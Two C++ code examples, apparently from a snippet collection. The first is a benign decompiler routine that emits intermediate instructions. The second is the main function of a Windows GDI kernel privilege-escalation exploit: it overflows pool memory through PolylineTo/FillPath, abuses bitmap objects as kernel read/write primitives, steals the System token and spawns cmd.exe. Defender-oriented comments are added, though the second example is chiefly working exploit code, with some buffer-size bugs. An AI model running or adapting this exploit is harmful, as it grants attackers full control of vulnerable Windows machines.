Example #1
0
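PINSTR	CCodeList_Maker::Code_general(int type, HLType t)
{	//	Only when type == enum_RR do callers use the return value.
	//	Emits one INSTR of high-level type t for the operand shape `type`
	//	(enum_00: no operands; enum_RR: read op[0] and op[1]; enum_WR: write
	//	op[0], read op[1]; enum_AR: op[0] is both read and written, op[1] read),
	//	with operands fetched from xcpu.op[] through TransVar().
	//	Returns the instruction appended via InstrAddTail(), or NULL when it
	//	was handed to WriteToAddress() instead (the return value is unused on
	//	those paths) or when `type` is not recognised.
	//	Ownership: p is allocated here and passed on to InstrAddTail() /
	//	WriteToAddress(); the unrecognised-type path is the only one that keeps
	//	it, and it frees it instead of leaking.
	PINSTR	p = new INSTR;  //new_INSTR
	p->type = t;
	switch (type)
	{
	case enum_00:
		InstrAddTail(p);
		return p;
	case enum_RR:
		{
			TransVar(&p->var_r1, 0);	//	0 means	xcpu.op[0]
			TransVar(&p->var_r2, 1);	//	1 means	xcpu.op[1]
			VarRead(p->va_r1);
			VarRead(p->va_r2);
		}
		InstrAddTail(p);
		return p;
	case enum_WR:
		{
			TransVar(&p->var_w, 0);	//	0 means	xcpu.op[0]
			TransVar(&p->var_r1, 1);	//	1 means	xcpu.op[1]
			if (t == i_Lea)
			{
				//	lea performs no memory read (no VarRead here): it is an
				//	assignment, or i_GetAddr when the source operand is not
				//	v_Tem (e.g. lea eax,[ebp]).
				p->type = i_Assign;
				if (p->var_r1.type != v_Tem)
				{
					p->type = i_GetAddr;
				}
			}
			else
			{
				VarRead(p->va_r1);
				//VarWrite(&p->var_w);
				if (p->var_w.type == v_Tem)
				{	//	v_Tem destination (presumably an address held in a
					//	temporary): WriteToAddress() takes over p.
					WriteToAddress(p);
					return NULL;	//	nobody uses this return value here
				}
			}
		}
		InstrAddTail(p);
		return p;
	case enum_AR:
		{
			VAR v;
			TransVar(&v, 0);	//	0 means	xcpu.op[0]
			TransVar(&p->var_r2, 1);	//	1 means	xcpu.op[1]
			//	op[0] is both a source and the destination.
			p->var_r1 = v;
			p->var_w = v;
			VarRead(p->va_r2);
			VarRead(p->va_r1);
			//VarWrite(&p->var_w);
			if (p->var_w.type == v_Tem)
			{	//	same as enum_WR: WriteToAddress() takes over p
				WriteToAddress(p);
				return NULL;	//	nobody uses this return value here
			}
		}
		InstrAddTail(p);
		return p;
	default:
		alert("why here 325426");
		delete p;	//	p was never handed to the list; do not leak it
		return NULL;
	}
}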
Example #2
0
// Entry point of a local privilege-escalation proof of concept that goes
// through the Windows GDI subsystem. The body is one linear procedure and
// each step depends on the kernel state left by the one before it, so it is
// documented in place rather than restructured. Names not defined in this
// listing (bits, bitmaps, hManager, hWorker, gConfig, fungshuei, SetAddress,
// WriteToAddress, ReadFromAddress, PsInitialSystemProcess,
// PsGetCurrentProcess) come from elsewhere in the file.
// Defender's view: the observable end state is an unprivileged process whose
// primary token has been replaced by the System process's token and which
// then spawns cmd.exe (bottom of the bitmap loop); everything leading up to
// it is ordinary GDI API use, so the effective mitigation is the kernel fix
// for the underlying GDI defect rather than a user-mode control.
// Note: `void main` is non-standard; the return type should be int.
void main(int argc, char* argv[]) {
	HDC hdc = GetDC(NULL);
	HDC hMemDC = CreateCompatibleDC(hdc);
	// A 0x5a x 0x1f, 32-bpp bitmap selected into the memory DC gives the
	// path operations below a target surface.
	HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
	HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);

	// Large point array (0x3fe01 entries); static so it is not placed on
	// the stack. All entries but two are set to (0x5a1f, 0x5a1f).
	static POINT points[0x3fe01];

	for (int l = 0; l < 0x3FE00; l++) {
		points[l].x = 0x5a1f;
		points[l].y = 0x5a1f;
	}
	points[2].y = 20;
	points[0x3FE00].x = 0x4a1f;
	points[0x3FE00].y = 0x6a1f;

	// Record a path of 0x156 polylines on the memory DC. Failures are only
	// logged; the procedure continues regardless.
	if (!BeginPath(hMemDC)) {
		fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
	}	

	for (int j = 0; j < 0x156; j++) {
		// After the first 0x20 iterations points[2].y is reset to the
		// common value; the first iterations use the odd value (20) set above.
		if (j > 0x1F && points[2].y != 0x5a1f) {
			points[2].y = 0x5a1f;
		}
		if (!PolylineTo(hMemDC, points, 0x3FE01)) {
			fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
		}
	}

	EndPath(hMemDC);
	//Kernel Pool Fung=Shuei
	// fungshuei() is defined elsewhere; by its name and position it prepares
	// kernel pool state before the path is filled — not verifiable here.
	fungshuei();
	//getchar();
	
	// FillPath on the recorded path is the step the author labels as the
	// trigger; its return value is again only logged.
	fprintf(stdout, "[+] Trigerring Exploit.\r\n");
	if (!FillPath(hMemDC)) {
			fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
		}
	printf("%s\r\n", "Done filling.");

	HRESULT res;
	// 0x100 bytes committed at a fixed address and filled with 0x01. `fake`
	// is not referenced again in this function; whatever role it has is for
	// code elsewhere. memset() runs even if VirtualAlloc() failed (null
	// dereference after the error message).
	VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!fake) {
		fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
	}
	memset(fake, 0x1, 0x100);
	
	// Scratch buffer for GetBitmapBits; `bits` is a file-level variable and
	// is never freed in this function.
	bits = malloc(0x1000);
	memset(bits, 0x42, 0x1000);
	// Scan the first 5000 handles in `bitmaps[]` (filled elsewhere). A copy
	// larger than 0x150 bytes is taken as the sign that this bitmap's object
	// was altered by the FillPath step (inferred from the flow; the threshold
	// is the author's). GetBitmapBits returns LONG; HRESULT merely holds it.
	for (int k=0; k < 5000; k++) {

		res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
		if (res > 0x150) {
			fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
			hManager = bitmaps[k];
			hWorker = bitmaps[k + 1];

			// Get Gh05 header to fix overflown header.
			// (Copies 0x10 bytes at offset 0x1d0 of the returned data and
			// prints them in hex.)
			static BYTE Gh04[0x9];
			fprintf(stdout, "\r\nGh04 header:\r\n");
			for (int i = 0; i < 0x10; i++){
				Gh04[i] = bits[0x1d0 + i];
				fprintf(stdout, "%02x", bits[0x1d0 + i]);
			}
			
			// Get Gh05 header to fix overflown header.
			// (Same for 0x10 bytes at offset 0xd90.)
			static BYTE Gh05[0x9];
			fprintf(stdout, "\r\nGh05 header:\r\n");
			for (int i = 0; i < 0x10; i++) {
				Gh05[i] = bits[0xd90 + i];
				fprintf(stdout, "%02x", bits[0xd90 + i]);
			}

			// Address of Overflown Gh04 object header
			// (8 bytes at offset 0x210, printed as the leaked address.)
			static BYTE addr1[0x7];
			fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
			for (int j = 0; j < 0x8; j++) {
				addr1[j] = bits[0x210 + j];
				fprintf(stdout, "%02x", bits[0x210 + j]);
			}
			//Get pvscan0 address of second Gh05 object
			// (8 bytes at offset 0xdf0; `pvscan` is filled but not used
			// again in this function.)
			static BYTE* pvscan[0x07];
			fprintf(stdout, "\r\nPvsca0:\r\n");
			for (int i = 0; i < 0x8; i++) {
				pvscan[i] = bits[0xdf0 + i];
				fprintf(stdout, "%02x", bits[0xdf0 + i]);
			}

			// Calculate address to overflown Gh04 object header.
			// Adjusts the two low bytes of the leaked address in place.
			addr1[0x0] = 0;
			int u = addr1[0x1];
			u = u - 0x10;
			addr1[1] = u;
			
			//Fix overflown Gh04 object Header
			// SetAddress()/WriteToAddress() are the file's kernel-write
			// primitives (defined elsewhere); here they restore the saved
			// header bytes.
			SetAddress(addr1);
			WriteToAddress(Gh04);

			// Calculate address to overflown Gh05 object header.
			addr1[0] = 0xc0;
			int y = addr1[1];
			y = y + 0xb;
			addr1[1] = y;

			//Fix overflown Gh05 object Header
			SetAddress(addr1);
			WriteToAddress(Gh05);

			// get System EPROCESS
			// Token replacement: read the token pointer out of the System
			// EPROCESS at gConfig.TokenOffset and write it into the current
			// process's EPROCESS at the same offset. This is the step a
			// defender can key on (process token no longer matches its logon
			// session, followed by a cmd.exe child).
			ULONG64 SystemEPROCESS = PsInitialSystemProcess();
			//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
			ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
			//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
			ULONG64 SystemToken = 0;
			// read token from system process
			ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
			// write token to current process
			ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
			SetAddress((BYTE *)&CurProccessAddr);
			
			WriteToAddress((BYTE *)&SystemToken);
			// Done and done. We're System :)
			system("cmd.exe");
			
			break;
		}
		if (res == 0) {
			fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
		}
	}
	getchar();
	//clean up
	// GDI objects and the fixed-address allocation are released; `bits`
	// (malloc above) is not, and `points` is static so the commented-out
	// free() would be wrong.
	DeleteObject(bitobj);
	DeleteObject(bitmap);
	DeleteDC(hMemDC);
	ReleaseDC(NULL, hdc);
	VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
	//free(points);
	
}